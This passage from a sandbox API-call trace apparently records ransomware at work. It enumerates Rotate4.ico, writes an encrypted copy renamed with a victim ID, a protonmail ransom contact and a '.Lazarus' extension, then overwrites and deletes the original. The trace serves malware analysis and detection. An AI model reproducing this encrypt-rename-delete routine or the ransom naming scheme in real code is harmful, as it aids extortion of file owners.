lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0074.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.797] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x0, cFileName="Rotate4.ico", cAlternateFileName="")) returned 1 [0074.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0074.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0074.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0074.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0074.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0074.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0074.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0074.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0074.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0074.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0074.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0074.798] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.798] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.798] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.798] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0074.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.798] AreFileApisANSI () returned 1 [0074.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico", lpUsedDefaultChar=0x0) returned 43 [0074.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0074.798] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.798] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0074.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0074.799] AreFileApisANSI () returned 1 [0074.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x66f40 [0074.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x66f40, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 43 [0074.799] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0074.799] GetFileType (hFile=0x410) returned 0x1 [0074.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x66f40 | out: hHeap=0x20000) returned 1 [0074.799] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0074.799] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0074.799] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0074.799] CloseHandle (hObject=0x410) returned 1 [0074.800] AreFileApisANSI () returned 1 [0074.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0074.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 43 [0074.800] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0074.800] GetFileType (hFile=0x410) returned 0x1 [0074.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0074.800] CloseHandle (hObject=0x410) returned 1 [0074.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0074.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0074.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0074.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0074.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0074.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0074.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0074.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0074.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0074.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0074.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.801] AreFileApisANSI () returned 1 [0074.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67900 [0074.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 43 [0074.801] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e)) returned 1 [0074.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0074.801] AreFileApisANSI () returned 1 [0074.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0074.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0074.802] GetLastError () returned 0x0 [0074.802] SetLastError (dwErrCode=0x0) [0074.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e0a0 [0074.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0074.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8be28 [0074.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0074.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0074.802] GetLastError () returned 0x0 [0074.802] SetLastError (dwErrCode=0x0) [0074.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0074.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0074.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68d60 [0074.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0074.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75fa8 [0074.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0074.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0074.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0074.802] AreFileApisANSI () returned 1 [0074.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0074.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x5a6b8 [0074.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=105 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 105 [0074.803] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0074.803] GetFileType (hFile=0x410) returned 0x1 [0074.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0074.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0074.803] AreFileApisANSI () returned 1 [0074.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0074.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67900 [0074.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 43 [0074.803] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.803] GetFileType (hFile=0x42c) returned 0x1 [0074.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0074.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0074.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0074.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.804] GetLastError () returned 0x0 [0074.804] SetLastError (dwErrCode=0x0) [0074.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.804] GetLastError () returned 0x0 [0074.804] SetLastError (dwErrCode=0x0) [0074.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0074.804] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x37e, lpOverlapped=0x0) returned 1 [0075.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0075.152] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0075.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0075.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x91458 [0075.152] GetLastError () returned 0x0 [0075.152] SetLastError (dwErrCode=0x0) [0075.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe) returned 0x7d540 [0075.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0075.153] GetLastError () returned 0x0 [0075.153] SetLastError (dwErrCode=0x0) [0075.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0075.153] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327ef70*=0x380, lpOverlapped=0x0) returned 1 [0075.154] GetLastError () returned 0x0 [0075.154] SetLastError (dwErrCode=0x0) [0075.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0075.154] GetLastError () returned 0x0 [0075.154] SetLastError (dwErrCode=0x0) [0075.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0075.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0075.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0075.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0075.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x91458 | out: hHeap=0x20000) returned 1 [0075.154] CloseHandle (hObject=0x410) returned 1 [0075.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0075.156] CloseHandle (hObject=0x42c) returned 1 [0075.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0075.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0075.156] AreFileApisANSI () returned 1 [0075.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67a20 [0075.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67a20, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 43 [0075.156] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0075.157] GetFileType (hFile=0x42c) returned 0x1 [0075.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67a20 | out: hHeap=0x20000) returned 1 [0075.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0075.158] GetLastError () returned 0xb7 [0075.158] SetLastError (dwErrCode=0xb7) [0075.158] WriteFile (in: hFile=0x42c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0075.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0075.159] CloseHandle (hObject=0x42c) returned 1 [0075.159] AreFileApisANSI () returned 1 [0075.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67900 [0075.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 43 [0075.159] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico")) returned 1 [0075.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0075.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0075.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0075.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0075.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0075.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0075.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0075.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0075.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0075.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0075.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0075.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8be28 | out: hHeap=0x20000) returned 1 [0075.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0075.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0075.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0075.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0075.160] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0075.160] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.160] InitOnceExecuteOnce 